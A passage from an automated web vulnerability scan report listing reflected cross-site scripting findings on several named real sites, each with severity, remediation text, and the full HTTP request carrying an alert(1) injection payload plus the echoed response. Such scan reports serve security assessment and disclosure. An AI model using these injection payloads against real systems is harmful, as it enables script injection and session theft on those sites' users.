   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/commentsdf349"-alert(1)-"078e172cde1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/comments?c1a8b"-alert(1)-"d726d012b6=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.124. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml2ff9b"-alert(1)-"3afa300d7b5/poll-link";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.125. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/poll-linka4083"-alert(1)-"6c029440ed4";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/poll-link?82efb"-alert(1)-"694f25fe67=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.127. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11905<script>alert(1)</script>ed7f0af6221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ not found</pre>
<BR>

3.128. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c2fc<script>alert(1)</script>bfbfed47bf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ not found</pre>
<BR>

3.129. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/65636/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df060<script>alert(1)</script>065331fd6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servletdf060<script>alert(1)</script>065331fd6cc/ajrotator/65636/0/vj?ajecscp=1289789123079&z=hpi&dim=63359&pos=1&pv=6400709303958913&nc=24682365 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 03:52:19 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servletdf060<script>alert(1)</script>065331fd6cc/ajrotator/65636/0/vj not found</pre>
<BR>

3.130. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/65636/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>595ff3ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator760f3<script>alert(1)</script>595ff3ead2/65636/0/vj?ajecscp=1289789123079&z=hpi&dim=63359&pos=1&pv=6400709303958913&nc=24682365 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 03:52:20 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator760f3<script>alert(1)</script>595ff3ead2/65636/0/vj not found</pre>
<BR>

3.131. http://ib.adnxs.com/ttj [pubclick parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the pubclick request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b7c'-alert(1)-'7a94292f04 was submitted in the pubclick parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=188804&pubclick=http://optimized-by.rubiconproject.com/t/5833/7750/0-9.3176628.3191651?url=30b7c'-alert(1)-'7a94292f04 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Cookie: sess=1; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNT6@0lh?1'4r(PA7vgjZ%ik>Crs)<5yw'L87xE/zK)*i9lX_S'5[U9t!s`RER.Iac'7T?$HphC)<J4)W=2G`+O4jGljh31voydy`Ra.W(lA.Gds=*e9!Qv?#pwV2sS:8+YKz$980X1vNaa; uuid2=5675696235378120575

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 16-Nov-2010 03:52:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNT6@0lh?1'4r(PA7vgj[d#fg0oR#5`nsErk%GqhtigT9)f>DjB6FhV*uTB.0![kr_sKgO4At=z:ML77B(ffw!8]^Kosf?jQq-cYSSs(-'ohOC2<ANw(R.Dum<-oIIzjELs-%v*0`u-wyg'1r6p7; path=/; expires=Sun, 13-Feb-2011 03:52:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata00=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: cdata01=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 15 Nov 2010 03:52:42 GMT
Content-Length: 463

document.write('<a href="http://optimized-by.rubiconproject.com/t/5833/7750/0-9.3176628.3191651?url=30b7c'-alert(1)-'7a94292f04http%3A%2F%2Fwww.consumernews28.com%2Fdiet%2F%3Ft202id%3D23065%26t202kw%3D160x600" target="_blank">
...[SNIP]...

3.132. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892af"%3balert(1)//60d6637fe36 was submitted in the mpck parameter. This input was echoed as 892af";alert(1)//60d6637fe36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277892af"%3balert(1)//60d6637fe36&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:37:45 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7011
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,636778627
...[SNIP]...
=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277892af";alert(1)//60d6637fe36\" target=\"_blank\">
...[SNIP]...

3.133. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44c0"><script>alert(1)</script>907f9db44a1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277c44c0"><script>alert(1)</script>907f9db44a1&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:37:13 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7197
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277c44c0"><script>alert(1)</script>907f9db44a1" TARGET="_blank">
...[SNIP]...

3.134. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e58c7"%3balert(1)//4841a3488a4 was submitted in the mpvc parameter. This input was echoed as e58c7";alert(1)//4841a3488a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=e58c7"%3balert(1)//4841a3488a4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:45:50 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 6987
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,636778627
...[SNIP]...
\"FlashVars\" VALUE=\"clickTAG=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=e58c7";alert(1)//4841a3488a4http://altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&clickTag=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^
...[SNIP]...

3.135. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14662/102883/728x90_theater.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715f3"><script>alert(1)</script>d0be7b9b1b0 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14662/102883/728x90_theater.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14662-102883-28901-13%3Fmpt%3D6367786277&mpt=6367786277&mpvc=http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=715f3"><script>alert(1)</script>d0be7b9b1b0 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: img.mediaplex.com
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:44:57 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 00:48:45 GMT
ETag: "4205a9-d4f-49041b1141540"
Accept-Ranges: bytes
Content-Length: 7197
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://r1.ace.advertising.com/click/site=0000781318/mnum=0000901911/cstr=62542473=_4ce06b8d,6367786277,781318^901911^1183^0,1_/xsxdata=$xsxdata/bnum=62542473/optn=64?trg=715f3"><script>alert(1)</script>d0be7b9b1b0http://altfarm.mediaplex.com/ad/ck/14662-102883-28901-13?mpt=6367786277" TARGET="_blank">
...[SNIP]...

3.136. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73316"><script>alert(1)</script>6045c0d1b5 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

